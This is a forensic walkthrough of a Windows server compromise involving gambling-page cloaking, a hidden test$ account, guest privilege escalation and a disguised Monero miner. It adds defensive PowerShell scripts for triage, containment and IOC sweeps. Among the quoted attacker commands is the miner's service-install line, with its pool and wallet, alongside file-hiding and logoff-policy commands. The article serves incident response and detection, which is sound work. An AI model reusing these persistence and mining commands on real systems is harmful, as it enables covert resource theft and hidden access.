Information Security

How Hackers Hijacked a Server with Hidden Accounts and Crypto‑Mining: A Forensic Walkthrough

This article details a multi‑stage server compromise that injected gambling pages, planted hidden accounts, deployed crypto‑mining software, and opened unnecessary ports, providing step‑by‑step forensic analysis, code inspection, emergency response actions, and indicators of compromise.

Efficient Ops

Introduction

This article summarizes a recent incident in which a customer's server was compromised. Pages served to search-engine crawlers contained gambling keywords, while the same URLs showed nothing unusual in a normal browser: classic black-hat SEO cloaking, where the injected content is revealed only to crawler user agents.

Overview

Findings

1) The server hosts both gambling content and mining programs, indicating that more than one attacker group has been on it.
2) On 2018-09-21 the server was breached and gambling content was added (source IP 175.41.27.93).
3) A web shell had been planted as early as February 2016.
4) Mining software was installed on 2017-12-19.
5) A hidden account test$ was created, and the guest account logged in from Ukraine (IP 212.66.52.88) on 2018-09-21 at 14:38.

Investigation Process

Compromise Indicators

In September 2018 the monitoring platform detected gambling pages injected into the website.

System Analysis

The analysis focused on system accounts, processes, open ports, services, startup items, file integrity, and key configuration files.

System Accounts

<code>Administraotr, MYSQL_ZKEYS, test$, zhimei, renjian, APP_IWAM_61264026, APP_IWAM_6127201, guest</code>

The <code>test$</code> account is clearly a hidden account: a trailing <code>$</code> keeps a local account out of <code>net user</code> output, and no legitimate administrator creates an account this way. Other suspicious accounts (e.g., <code>zhimei</code>, <code>renjian</code>) require verification with the customer.

Analysis of the local Administrators group showed that <code>guest</code> had been added to it, a typical attacker move to keep a low-profile account with full privileges.

In summary: 1) the server was given a hidden <code>test$</code> account; 2) the <code>guest</code> account was added to the Administrators group.

Log analysis showed the <code>guest</code> account logging in from the Ukrainian IP (212.66.52.88) at the time noted above, confirming that the attacker held working credentials for the account.
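The three account findings above (a hidden "$" account, Guest in Administrators, and logons from a known-bad address) can be checked in one pass. The script below is an added example, not from the original article. It uses the WinNT ADSI provider rather than Get-LocalUser so it also runs on the older Windows Server generations this machine appears to be (the APP_IWAM_* accounts are IIS 5/6 era); it must run elevated. $BadIPs and $Since come from the article's IOCs, and $ReportPath is an assumed output location.

```powershell
# Added example (not part of the original article): local account triage.
# Assumptions: elevated session, English Windows, $ReportPath writable.
$BadIPs     = @('212.66.52.88', '175.41.27.93')     # from the article's IOC list
$Since      = Get-Date '2018-09-21'                  # breach date from the findings
$ReportPath = 'C:\IR\logons-from-ioc-ips.csv'        # assumed output location

$computer = [ADSI]"WinNT://$env:COMPUTERNAME"
$users    = @($computer.Children | Where-Object { $_.SchemaClassName -eq 'user' })
$names    = $users | ForEach-Object { "$($_.Name)" }

# 1. Names ending in "$" are omitted from "net user" output, which is exactly why an
#    attacker picks them; enumerating through ADSI (or wmic useraccount) still shows them.
"All local accounts : $($names -join ', ')"
foreach ($n in ($names | Where-Object { $_ -like '*$' })) { "FINDING: hidden-style account $n" }

# 2. Local Administrators membership. Guest must never be here; print the whole list
#    so unexplained names (zhimei, renjian) can be checked with the owner.
$group  = [ADSI]"WinNT://$env:COMPUTERNAME/Administrators,group"
$admins = @($group.Invoke('Members') | ForEach-Object {
    $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
})
"Administrators     : $($admins -join ', ')"
if ($admins -contains 'Guest') { 'FINDING: Guest is a member of Administrators' }

# 3. Is Guest enabled at all? ADS_UF_ACCOUNTDISABLE is bit 0x2 of UserFlags.
$guest = [ADSI]"WinNT://$env:COMPUTERNAME/Guest,user"
if (($guest.UserFlags.Value -band 2) -eq 0) { 'FINDING: Guest account is enabled' }

# 4. Successful logons (Security event 4624) from the IOC addresses since the breach
#    date. Parse the event XML: the position of IpAddress in Properties differs between
#    Windows versions, the EventData field name does not.
New-Item -ItemType Directory -Force -Path (Split-Path $ReportPath) | Out-Null
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction SilentlyContinue
$hits = foreach ($e in $events) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($BadIPs -contains $d['IpAddress']) {
        [pscustomobject]@{
            Time      = $e.TimeCreated
            Account   = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
            LogonType = $d['LogonType']   # 10 = RDP, 3 = network (SMB, IIS), 2 = console
            SourceIP  = $d['IpAddress']
        }
    }
}
$hits | Sort-Object Time | Format-Table -AutoSize
$hits | Export-Csv -NoTypeInformation -Path $ReportPath
```

On Server 2012 R2 and later, Get-LocalUser and Get-LocalGroupMember give the same answers with less ceremony. The LogonType column is worth reading: type 10 means the Ukrainian source came in over RDP, type 3 means a network logon such as SMB or IIS authentication, which points at different entry paths and different ports to close.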

Process and Service Analysis

CPU usage sat constantly at 100 % because a process named <code>SQLServer.exe</code> was consuming all resources. The name imitates Microsoft SQL Server, whose real database engine runs as <code>sqlservr.exe</code> from the SQL Server installation directory; this one is different on both counts.

The executable resides in <code>C:\ProgramData\MySQL</code>, a hidden directory containing two batch files and two executables.

Analysis of <code>Startservice.bat</code> revealed that it:

1) Sets the service name to <code>SystemHost</code>.
2) Installs the mining program as that service through <code>Tomcat9.exe</code> with the command:
<code>Tomcat9 install "%SERVICE_NAME%" SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777 -u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1 -t 0</code>
Here <code>-o</code> is the mining pool, <code>-u</code> the Monero wallet that receives the proceeds, <code>-p</code> the pool password and <code>-t</code> the thread count.
3) Sets the process name to <code>SQLServer.exe</code>.
4) Hides all files in the directory with <code>attrib +h +r %cd%\*.*</code>.
5) Modifies registry keys so that RDP sessions never time out.
6) Disables forced logoff with <code>net accounts /forcelogoff:no</code>.

The companion script <code>mHi.bat</code> hides the <code>C:\ProgramData\MySQL</code> folder and restricts access to certain files to the SYSTEM account.

Both <code>SQLServer.exe</code> and its parent <code>Tomcat9.exe</code> take part in the mining: the parent is the service wrapper that launches the miner and relaunches it whenever it exits, so terminating the child alone only causes the parent to start a fresh copy.
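The batch files describe the persistence the attacker left behind; the script below turns each of those behaviours into a hunt on a live host. It is an added example, not the article's own tooling, and must run elevated. The article says the registry was changed so RDP sessions never time out but does not name the keys; mapping that to the Terminal Services policy values under HKLM\SOFTWARE\Policies is my assumption.

```powershell
# Added example (not part of the original article): hunt for the artefacts that
# Startservice.bat and mHi.bat leave behind. Assumptions: elevated session, English
# Windows (the "net accounts" text match is locale-dependent), names from the article.
$SvcName = 'SystemHost'
$DropDir = 'C:\ProgramData\MySQL'

# 1. Services whose binary lives somewhere a service binary has no business being.
#    A Windows-sounding service name pointing into ProgramData is the tell.
Get-CimInstance Win32_Service |
    Where-Object { $_.Name -eq $SvcName -or $_.PathName -match 'ProgramData|Tomcat9|SQLServer\.exe' } |
    Select-Object Name, DisplayName, State, StartMode, StartName, PathName |
    Format-List

# 2. Hidden and read-only files (attrib +h +r) in the drop directory; -Force lists them.
Get-ChildItem -Path $DropDir -Force -Recurse -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime, Attributes |
    Format-Table -AutoSize

# 3. mHi.bat restricted some files to SYSTEM. A DACL that grants SYSTEM but has no
#    Administrators entry at all is not something an installer produces.
Get-ChildItem -Path $DropDir -Force -File -ErrorAction SilentlyContinue | ForEach-Object {
    $acl = Get-Acl -Path $_.FullName
    [pscustomobject]@{
        File   = $_.Name
        Owner  = $acl.Owner
        Access = ($acl.Access | ForEach-Object { "$($_.IdentityReference):$($_.FileSystemRights)" }) -join '; '
    }
} | Format-Table -AutoSize -Wrap

# 4. RDP session limits forced to "never" (0). Assumed mapping of the article's
#    "registry keys" to the Terminal Services policy values; these are normally absent.
$rdpPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
foreach ($v in 'MaxIdleTime', 'MaxDisconnectionTime', 'MaxConnectionTime') {
    $val = (Get-ItemProperty -Path $rdpPolicy -Name $v -ErrorAction SilentlyContinue).$v
    if ($null -ne $val) { "RDP policy $v = $val (0 = never; any explicit value here needs explaining)" }
}

# 5. "net accounts /forcelogoff:no" shows as "Never" in net accounts output. The
#    default is also Never, so this only matters where the owner had configured a
#    logon-hours logoff; record it as context rather than as a finding on its own.
(net accounts) -match 'Force user logoff'
```

Read the service list together with the process tree: a service whose PathName is a renamed wrapper in ProgramData, plus a hidden directory whose ACLs exclude Administrators, is enough to justify imaging the directory before anything is changed.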

Emergency Response

To stop the mining, first terminate the parent process:

<code>wmic process where Name="Tomcat9.exe" call terminate</code>

Then terminate the child:

<code>wmic process where Name="SQLServer.exe" call terminate</code>

After both are stopped, CPU usage returns to normal.
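The two wmic calls above are the minimum; in practice the service registration that launched Tomcat9.exe also has to go, or the parent returns at the next boot, and the evidence should be copied before anything is killed. The following is an added example of that fuller containment sequence, not the article's own steps. Names and paths are the article's; $Evidence is an assumed location. The "install <service> <program> <args>" syntax in Startservice.bat resembles a service wrapper such as NSSM, which restarts its child when the child dies; that identification is my reading, the article does not name the wrapper.

```powershell
# Added example (not part of the original article): contain the miner in the right
# order and keep evidence. Assumptions: elevated session, $Evidence writable, English
# performance-counter names.
$SvcName  = 'SystemHost'
$Parent   = 'Tomcat9.exe'
$Child    = 'SQLServer.exe'
$DropDir  = 'C:\ProgramData\MySQL'
$Evidence = 'C:\IR\evidence'          # assumed location

New-Item -ItemType Directory -Force -Path $Evidence | Out-Null

# 0. Snapshot the process tree and the drop directory before touching anything.
$miners = Get-CimInstance Win32_Process | Where-Object { $_.Name -in @($Parent, $Child) }
$miners | Select-Object ProcessId, ParentProcessId, Name, ExecutablePath, CommandLine, CreationDate |
    Export-Csv -NoTypeInformation -Path (Join-Path $Evidence 'miner-processes.csv')
Copy-Item -Path $DropDir -Destination $Evidence -Recurse -Force -ErrorAction SilentlyContinue

# 1. Stop and disable the service first; otherwise the Service Control Manager (or the
#    wrapper's own restart logic) brings the parent straight back.
if (Get-Service -Name $SvcName -ErrorAction SilentlyContinue) {
    Stop-Service -Name $SvcName -Force -ErrorAction SilentlyContinue
    Set-Service  -Name $SvcName -StartupType Disabled
}

# 2. Parent first, then the children it owns (enumerated before the parent dies), then
#    any orphaned child. The child is matched on path as well as name: the genuine SQL
#    Server engine is sqlservr.exe, but a host might run a legitimate SQLServer.exe too.
foreach ($p in (Get-CimInstance Win32_Process -Filter "Name='$Parent'")) {
    $kids = Get-CimInstance Win32_Process -Filter "ParentProcessId=$($p.ProcessId)"
    Stop-Process -Id $p.ProcessId -Force -ErrorAction SilentlyContinue
    $kids | ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }
}
Get-CimInstance Win32_Process -Filter "Name='$Child'" |
    Where-Object { $_.ExecutablePath -like "$DropDir\*" } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }

# 3. Verify nothing came back and that CPU has actually dropped.
Start-Sleep -Seconds 10
$left = Get-CimInstance Win32_Process | Where-Object { $_.Name -in @($Parent, $Child) }
if ($left) { "STILL RUNNING: $($left.Name -join ', ') (look for a second persistence mechanism)" }
else       { 'Miner processes gone' }
$sample = Get-Counter '\Processor(_Total)\% Processor Time' -SampleInterval 1 -MaxSamples 2
'CPU now {0:N1}%' -f $sample[-1].CounterSamples[0].CookedValue

# 4. Remove the service registration. Leave the files in place (still hidden) until the
#    evidence copy has been hashed and handed over; deleting them now destroys evidence.
sc.exe delete $SvcName
```

If step 3 reports the processes back within ten seconds, the service was not the only launcher: check scheduled tasks, Run keys and WMI event subscriptions before repeating the kill.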

Open Port Analysis

The server had numerous open ports; the original article's screenshots show the full list, which is not reproduced here.

It is recommended to close ports 21 (FTP), 135 (RPC endpoint mapper), 445 (SMB) and 8080 (alternate HTTP), and to evaluate the necessity of every other listening port against actual business needs.
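Closing ports is only safe once you know which process owns each listener; a listener on 8080 may be the legitimate application or the web shell's host. The script below is an added example, not from the article: it lists listening TCP ports with their owning process, flags the four ports named above, and prints (or, with the assumed $Apply switch set, creates) host-firewall block rules. Get-NetTCPConnection needs Windows 8 / Server 2012 or later; the netstat fallback covers the older generation this server belonged to.

```powershell
# Added example (not part of the original article): listening ports with owners,
# flagged against the article's close list. Assumptions: elevated session (needed to
# read other users' process paths), $Apply is my own switch, default off.
$HighRisk = @{ 21 = 'FTP'; 135 = 'RPC endpoint mapper'; 445 = 'SMB'; 8080 = 'alternate HTTP' }
$Apply    = $false

function Get-Listeners {
    if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
        Get-NetTCPConnection -State Listen | ForEach-Object {
            [pscustomobject]@{ Port = [int]$_.LocalPort; Address = $_.LocalAddress; PID = [int]$_.OwningProcess }
        }
    } else {
        # netstat -ano line: "  TCP    0.0.0.0:135     0.0.0.0:0     LISTENING     876"
        (netstat -ano) | ForEach-Object {
            if ($_ -match '^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)') {
                [pscustomobject]@{ Port = [int]$Matches[2]; Address = $Matches[1]; PID = [int]$Matches[3] }
            }
        }
    }
}

$report = Get-Listeners | ForEach-Object {
    $proc = Get-Process -Id $_.PID -ErrorAction SilentlyContinue
    $risk = if ($HighRisk.ContainsKey($_.Port)) { "CLOSE: $($HighRisk[$_.Port])" } else { 'review' }
    [pscustomobject]@{
        Port    = $_.Port
        Address = $_.Address
        PID     = $_.PID
        Process = $proc.ProcessName
        Path    = $proc.Path
        Risk    = $risk
    }
} | Sort-Object Port, Address
$report | Format-Table -AutoSize

# Block the flagged ports at the host firewall. The real fix is at the service (stop and
# disable FTP, disable SMB if unused, remove the 8080 listener); the rule buys time.
# netsh advfirewall works from Server 2008 onwards, unlike New-NetFirewallRule.
foreach ($port in ($report.Port | Where-Object { $HighRisk.ContainsKey($_) } | Sort-Object -Unique)) {
    $name = "IR block TCP $port ($($HighRisk[$port]))"
    $cmd  = "netsh advfirewall firewall add rule name=`"$name`" dir=in action=block protocol=TCP localport=$port"
    if ($Apply) { Invoke-Expression $cmd; "Applied: $name" } else { "Would run: $cmd" }
}
```

Anything in the "review" rows whose Path is under ProgramData, Temp or the web root deserves the same scrutiny as the flagged ports: the miner in this case did not need an inbound port, but a web shell or a backdoor listener would show up exactly there.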

Conclusion

The forensic analysis identified the following critical issues:

1) Hidden account <code>test$</code> created.
2) <code>guest</code> account added to Administrators and logged into from a Ukrainian IP.
3) Excessive open ports, with several high-risk ports recommended for closure.
4) Crypto-mining software planted on 2017-12-19.

Indicators of Compromise (IOC)

IP Addresses

212.66.52.88
175.41.27.93

Malicious URL

http://l5.wang2017.com

Sample MD5 Hashes

70D9E2761B18CB0E4C4051E905F9E7A5
EA9F0B1E88B5E21B9A9D31D5C46E81D7
A3CD992FDDC2300AD8A23AD16FE3725C
A8ADE1F8D0D87E4D7A75919EE6B3740F
58A9B144762916FE227AF329F5D384F1
DBBB0ACE277D955833696F06C610DE2E
7F7D78755E070860EFFFD1272F14C7A7
9A5772ED22973DA02A45872BBC3735F2
E276D34B3AE124E8218CBC32B4D341B2
B663F32281526B17A540655EC05EC9EC
0D66C67B8BEC9627B696DEB275862E72
634630797CACCC334EFF054FE6279E91
AB908A995367FF0055DFF903F515B061
5D52847EC2CCC750951EF0765AEEC17B
249D7774648FB1CD309AA23B3F96430B
C13D2297D244D398B6A311DDA87DBDC7
C23206B81B06D64933C5FBC24AF69CF6
E14E6B1629ED5079F55B69DF66EDAFD7
8D01D604794D3494CBB31570B1E54182
2A235990DD38A0BCBAF2C4835EB8C0A3
5D568BC15EE4D861583E68B63762C2B1

Mining Pool

<code>stratum+tcp://pool.minexmr.com:7777</code>

Wallet Address

<code>49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F</code>
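The IOC list is most useful when it can be swept across other hosts quickly. The script below is an added example, not from the article: it hashes files under a set of directories and compares them with the sample MD5s above, then searches smaller files for the pool host, the malicious URL, the wallet and the two IP addresses. $Roots is an assumed set of directories; on the real server it should include the web root and ProgramData. Get-FileHash needs PowerShell 4 or later.

```powershell
# Added example (not part of the original article): sweep a host for the article's
# IOCs. Assumptions: $Roots is a guess at where to look, elevated session so hidden
# and SYSTEM-only files can be read.
$Roots = @('C:\ProgramData', 'C:\inetpub\wwwroot', 'C:\Windows\Temp')   # assumed

$KnownMD5Text = @'
70D9E2761B18CB0E4C4051E905F9E7A5 EA9F0B1E88B5E21B9A9D31D5C46E81D7 A3CD992FDDC2300AD8A23AD16FE3725C
A8ADE1F8D0D87E4D7A75919EE6B3740F 58A9B144762916FE227AF329F5D384F1 DBBB0ACE277D955833696F06C610DE2E
7F7D78755E070860EFFFD1272F14C7A7 9A5772ED22973DA02A45872BBC3735F2 E276D34B3AE124E8218CBC32B4D341B2
B663F32281526B17A540655EC05EC9EC 0D66C67B8BEC9627B696DEB275862E72 634630797CACCC334EFF054FE6279E91
AB908A995367FF0055DFF903F515B061 5D52847EC2CCC750951EF0765AEEC17B 249D7774648FB1CD309AA23B3F96430B
C13D2297D244D398B6A311DDA87DBDC7 C23206B81B06D64933C5FBC24AF69CF6 E14E6B1629ED5079F55B69DF66EDAFD7
8D01D604794D3494CBB31570B1E54182 2A235990DD38A0BCBAF2C4835EB8C0A3 5D568BC15EE4D861583E68B63762C2B1
'@
$hashSet = New-Object 'System.Collections.Generic.HashSet[string]' ([System.StringComparer]::OrdinalIgnoreCase)
foreach ($h in ($KnownMD5Text -split '\s+' | Where-Object { $_ })) { [void]$hashSet.Add($h) }

# String IOCs from the article. A repacked miner will not match the MD5s, but the pool,
# the wallet and the C2 host name survive recompilation, so these catch variants.
$Strings = @(
    'pool.minexmr.com',
    'l5.wang2017.com',
    '212.66.52.88',
    '175.41.27.93',
    '49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F'
)

$files = Get-ChildItem -Path $Roots -Recurse -Force -File -ErrorAction SilentlyContinue

# 1. Hash match against the sample list.
$hashHits = foreach ($f in $files) {
    $h = Get-FileHash -Path $f.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
    if ($h -and $hashSet.Contains($h.Hash)) {
        [pscustomobject]@{ Type = 'MD5'; File = $f.FullName; Match = $h.Hash; LastWrite = $f.LastWriteTime }
    }
}

# 2. Literal string match in files small enough to scan cheaply (batch files, configs,
#    injected pages and the miner binary itself all fit).
$stringHits = foreach ($f in ($files | Where-Object { $_.Length -lt 5MB })) {
    $m = Select-String -Path $f.FullName -Pattern $Strings -SimpleMatch -List -ErrorAction SilentlyContinue
    if ($m) {
        [pscustomobject]@{ Type = 'string'; File = $f.FullName; Match = $m.Pattern; LastWrite = $f.LastWriteTime }
    }
}

$all = @($hashHits) + @($stringHits)
if ($all.Count -eq 0) { "No IOC matches under $($Roots -join ', ')" }
else { $all | Sort-Object LastWrite | Format-Table -AutoSize -Wrap }
```

The LastWrite column is the reason to sort the output: in this incident the web shell (2016), the miner (2017-12-19) and the gambling pages (2018-09-21) were three separate intrusions, and file timestamps are what separate them.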

The analysis was originally authored by "feiniao" and republished from FreeBuf.COM.

Tags: incident response, information security, crypto mining, server compromise, webshell analysis
Written by Efficient Ops

This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
